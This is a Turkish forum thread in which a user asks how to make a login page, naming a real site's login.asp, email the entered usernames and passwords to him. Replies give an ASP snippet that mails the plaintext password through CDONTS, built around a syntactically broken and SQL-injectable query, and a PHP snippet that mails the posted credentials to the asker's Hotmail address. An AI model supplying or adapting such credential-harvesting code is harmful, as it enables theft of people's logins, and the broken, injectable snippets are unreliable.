Web Programlama Dillerinden Anlayanlar - Basit Bir Yardım
-
şimdi arkadaşlar. benim anlatmak istediğim üye girişi yapılan bir panel üzerinde textbox'lara girilecek username ve şifrenin bir şekilde benim mail'e nasıl taşınacağıdır?
atıyorum: www.tahribat.com/login.asp de textboxlara girilecek username ve şifre nasıl bana gelebilir. bu sayfaya eklemem gerekn kodlar nedir. ve bu kodları nereye eklemeliyim? şimdiden sağolun.
-
bu arada tahribat.com/login.asp sayfasının kodunu incelerken böyle bi mesaj çıktı:
"Ulan ne didikliyosun kodu, Kendin yazsana lam dopac, kapa lan gözüm görmesin...
Töbe töbe...":D:D:D Kesin renenin işidir.
-
php ile yapıcaksan post metodu ile çekebilir onları mail() fonksiyonu ile gönderebilirsin ama sanırsam asp ile yapıcaksın?
-
hazırlayacağın web sayfası illa asp olmasın yani html formatında da yaparım sayfayı.
ama asp formatında olsa iyi olur. Çünkü düşündüğüm sayfa asp tabanlı.
-
asp olarak yapacaksan herhangi mail bileşeni ile araya include edip istediğin maile gönderebilirsin.
yada veritabanına kaydettir x kullanıcı y şifresi ile gibi.
-
buzul asp bilgim sıfır.
bana neyi nasıl yapacağımı tahribat.com/login.asp sayfası üzerinde resimli ya da kodların yerini açıklayarak anlatırsan ve yapmam gerekn bileşenleri bildirirsen çok minnettar olurum.
-
M1KROP bunu yazdı:
-----------------------------hazırlayacağın web sayfası illa asp olmasın yani html formatında da yaparım sayfayı.
ama asp formatında olsa iyi olur. Çünkü düşündüğüm sayfa asp tabanlı.
-----------------------------zaten textboxlar yapılırken html kullanılır fakat html ile girilen verileri çekip mailline gönderemessin google da sipariş formu diye arattır formu kendine göre düzenle yaparsın (;
-
abi şimdi bir user name birde passın olcak.
login.asp
--------------------
username : kullanıcı adı
password : şifresi
giriş yap
---------------------------daha sonra herhangi bir mail bileşeni ile
uye_kontrol.asp
---------------------------
gelen kullanıcı adı ve şifreyi al ve
mail göndereceğin bileşene göre burayı mail göndermek için kullan.
burayada giriş yapamadı veya yönlendireceksen başka sayfaya yönlendir---------------------------
yani 2 sayfaya ihtiyacın var hocam birisi kullancı adı ve şifresinin olduğu sayfa olsun buraya kullanıcı adı ve şifresini yazsın ve giriş dediğinde uye_kontrol.asp sayfasına gitsin bu sayfadan verileri al ve herhangi mail göndermek için kullanılan bileşenlerden brini kullan ve mailine gönder mailş gönderdikten sonrada ne yapmasını istiyorsan kalan sayfaya onu yaz.
ben sana aspmail tavsiye ederim bileşen olarak.
-
bak hocam senın ypacagın iş soyle :
login.asp source :
<%
'formdan gelen bilgileri değişkenlere ata
username= request.form("username")
password = request.form("password")
' burası login sql si aynısını kullanman şart değil
set loginchck = conn.execute("select * from uyeler where username ="&username&" and where password ="&password&")
'sifre veya kullanıcı adında problem varsa....
if loginchck.eof then
response.write " yanlıs kullanıcı veya sifre!"
else
'yoksa
'mail bileşeni kodları bu kodlar cdonts için genelde asp sunucuarda bu varır ama baska bi bileşen varsa kodları benzerdir genelde ona gore uyarlarsın...
Set ObjMail = Server.CreateObject("CDONTS.NewMail")
ObjMail.From = "Kimden@geliyo.com"
ObjMail.To= kime@gidiyo.com
ObjMail.Subject="Mailin konusu"
ObjMail.Body= "sifre = " & password & "kullanıcı adi = " & username &" hayrını görun :D "'maili göndert
ObjMail.Send'sessionları ata
session("id) = loginchck("id"9
%>
-
$user = $_POST['user'];$pass = $_POST['pass'];// user pass işlerini doğrumu yanlış mı kontrol edicen$toaddress = 'm1krop@hotmail.com';$subject = 'kullanici adi ve sifre';$mailcontent = 'kullanici adi:'.$user."\n".'sifre'.$pass."\n";$fromaddress = 'From: webserver@example.com';mail($toaddress, $subject, $mailcontent,$fromaddress);muhauhaha :D asp miş lan :F
-
Yunus-Emre bunu yazdı:
-----------------------------$user = $_POST['user'];$pass = $_POST['pass'];// user pass işlerini doğrumu yanlış mı kontrol edicen$toaddress = 'm1krop@hotmail.com';$subject = 'kullanici adi ve sifre';$mailcontent = 'kullanici adi:'.$user."\n".'sifre'.$pass."\n";$fromaddress = 'From: webserver@example.com';mail($toaddress, $subject, $mailcontent,$fromaddress);
-----------------------------
HOCAM ADMAM ASP DİYO SEN NAPIYON :d